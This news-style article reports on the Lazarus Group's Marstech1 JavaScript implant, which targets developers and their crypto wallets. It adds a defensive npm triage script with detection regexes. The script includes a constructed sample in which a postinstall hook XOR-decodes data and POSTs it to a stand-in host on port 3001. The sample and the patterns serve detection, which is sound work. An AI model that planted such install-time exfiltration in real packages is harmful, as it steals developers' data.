
SecurityScorecard has uncovered a new operation dubbed “Marstech Mayhem,” attributed to North Korea’s Lazarus Group. The campaign features a previously unknown JavaScript implant called Marstech1, targeting developers through a GitHub repository managed by a profile named “SuccessFriend.”
The malware, first detected in December 2024, has affected 233 victims across the U.S., Europe, and Asia. It primarily targets cryptocurrency assets, specifically browser extensions and cryptocurrency wallets including MetaMask, Exodus, and Atomic, across Windows, Linux, and macOS.
Key Features of the Attack:
– Sophisticated obfuscation techniques including control flow flattening and multi-stage XOR decryption
– Capability to collect system information
– Potential for supply chain attacks through website and NPM package embedding
– Command-and-control server operations on ports 3000 and 3001
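The list above names the traits a defender can look for when a dependency is suspect: an npm lifecycle hook that runs at install time, a byte-wise XOR decode loop over an inline blob, and an outbound call to a host on port 3000 or 3001. The following triage helper is an added example written for this page, not code from SecurityScorecard or from the Marstech1 analysis; its regex heuristics and the sample package it inspects are constructed here and are not Marstech1 indicators.

```javascript
"use strict";

// Lifecycle scripts npm runs automatically during `npm install`; an implant
// embedded in a package would usually run from one of these.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Constructed heuristics for the traits named in the summary (not Marstech1 signatures).
const XOR_DECODE = /charCodeAt\([^)]*\)\s*\^/;          // byte-wise XOR decode loop
const C2_PORT = /:(?:3000|3001)\b/;                      // host:3000 or host:3001
const NETWORK_CALL = /\.request\s*\(|\bfetch\s*\(|\bWebSocket\s*\(/;

// Return the install-time hooks declared in a package.json document.
function findInstallHooks(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return INSTALL_HOOKS.filter((hook) => typeof scripts[hook] === "string");
}

// Return the trait labels present in one JavaScript source file.
function scanSource(jsText) {
  const traits = [];
  if (XOR_DECODE.test(jsText)) traits.push("xor-decode-loop");
  if (C2_PORT.test(jsText)) traits.push("port-3000-3001");
  if (NETWORK_CALL.test(jsText)) traits.push("network-call");
  return traits;
}

// A package is flagged only when an install hook, a decode loop and an
// outbound call (or the named ports) all appear together: one trait alone is common.
function triagePackage(packageJsonText, jsText) {
  const hooks = findInstallHooks(packageJsonText);
  const traits = scanSource(jsText);
  const suspicious = hooks.length > 0 && traits.includes("xor-decode-loop") &&
    (traits.includes("port-3000-3001") || traits.includes("network-call"));
  return { hooks, traits, suspicious };
}

// Constructed sample: postinstall runs setup.js, which XOR-decodes an inline
// blob and posts the result to a server on port 3001.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-utils", version: "1.0.0",
  scripts: { postinstall: "node setup.js", test: "mocha" },
});
const SAMPLE_SETUP_JS = `
const blob = "\\x1a\\x2b\\x3c"; let out = "";
for (let i = 0; i < blob.length; i++) out += String.fromCharCode(blob.charCodeAt(i) ^ 0x5a);
require("https").request("https://example.invalid:3001/collect", { method: "POST" }).end(out);
`;

console.log(JSON.stringify(triagePackage(SAMPLE_PACKAGE_JSON, SAMPLE_SETUP_JS)));
```

Run it over each dependency's package.json and its entry scripts after `npm install --ignore-scripts`; a `suspicious: true` result is a prompt for manual review, not a verdict.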
In a related development, Recorded Future identified a parallel campaign called “Contagious Interview,” targeting cryptocurrency organizations between October and November 2024. This operation, attributed to North Korean IT workers operating under various aliases (PurpleBravo, CL-STA-0240, Famous Chollima, and Tenacious Pungsan), poses significant risks including data theft and potential sanctions violations for organizations unknowingly employing these operators.
The GitHub profile associated with the attack has since been removed, but the ongoing campaign highlights the persistent threat posed by North Korean cyber operations to the cryptocurrency and technology sectors.